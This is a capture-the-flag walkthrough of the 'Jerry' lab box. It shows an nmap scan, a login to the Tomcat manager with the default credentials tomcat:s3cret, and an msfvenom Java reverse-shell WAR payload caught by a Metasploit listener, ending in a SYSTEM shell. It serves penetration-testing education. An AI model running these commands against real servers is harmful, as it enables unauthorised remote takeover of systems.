Jerry is a beginner box that tests a user’s ability to enumerate running services, locate default credentials, and generate exploit shellcode.
Step 1: Enumerate with NMAP
We first run NMAP against the target to see what ports are open and which services are running.
➜ jerry nmap -A -v 10.129.136.9 -Pn -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-20 14:50 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:50
Completed NSE at 14:50, 0.00s elapsed
Initiating NSE at 14:50
Completed NSE at 14:50, 0.00s elapsed
Initiating NSE at 14:50
Completed NSE at 14:50, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:50
Completed Parallel DNS resolution of 1 host. at 14:50, 0.00s elapsed
Initiating Connect Scan at 14:50
Scanning 10.129.136.9 [65535 ports]
Discovered open port 8080/tcp on 10.129.136.9
Connect Scan Timing: About 20.11% done; ETC: 14:53 (0:02:03 remaining)
Connect Scan Timing: About 48.46% done; ETC: 14:53 (0:01:05 remaining)
Completed Connect Scan at 14:52, 104.31s elapsed (65535 total ports)
Initiating Service scan at 14:52
Scanning 1 service on 10.129.136.9
Completed Service scan at 14:52, 6.07s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.136.9.
Initiating NSE at 14:52
Completed NSE at 14:52, 1.00s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.12s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Nmap scan report for 10.129.136.9
Host is up (0.023s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
NSE: Script Post-scanning.
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.05 seconds
We can see that Apache Tomcat is running on port 8080. Let’s try opening this page in a browser at http://10.129.136.9:8080
.
Step 2: Searching for Default Credentials
We then noticed the manager app link on the right and tried to log in with potential default credentials, admin:admin
. This attempt fails, but we are presented with documentation that may provide another default credential, tomcat:s3cret
. We are able to log into the manager app with the newly found credentials.
Step 3: Generate Reverse Shell Exploit Code and Start Listener
Upon logging in we are presented with a lot of information, but the WAR file upload form sticks out as a potential attack vector.
With this knowledge in hand, we can use MsfVenom to generate a reverse shell to give us access to the server.
➜ jerry msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.86 LPORT=4444 -f war > jerry.war
Payload size: 13316 bytes
Final size of war file: 13316 bytes
We will also need a listener to catch the request from the victim server, so we can use Metasploit to simplify this process.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/shell_reverse_tcp
payload => java/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.10.14.86
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.86:4444
[*] Command shell session 1 opened (10.10.14.86:4444 -> 10.129.136.9:49192) at 2023-01-20 15:09:46 -0500
We are using a handler with a Java tcp reverse shell payload to catch the shell from the WAR file we uploaded to the server earlier. We simply supply the ip address/interface of the attacking machine and the port on which we are listening for a connection. Afterwards, we can run the exploit and wait for the victim server to connect.
Step 4: Exploit Target
We can visit the following link to force the victim server to load the WAR file into memory and execute our exploit: http://10.129.136.9:8080/jerry/
. Our listener then updates to the following, indicating that we have a connection to the victim.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
We can then run the whoami
command to confirm that we have elevated privileges on the system. With this done, all that is left is to navigate to each user’s desktop and collect the flags.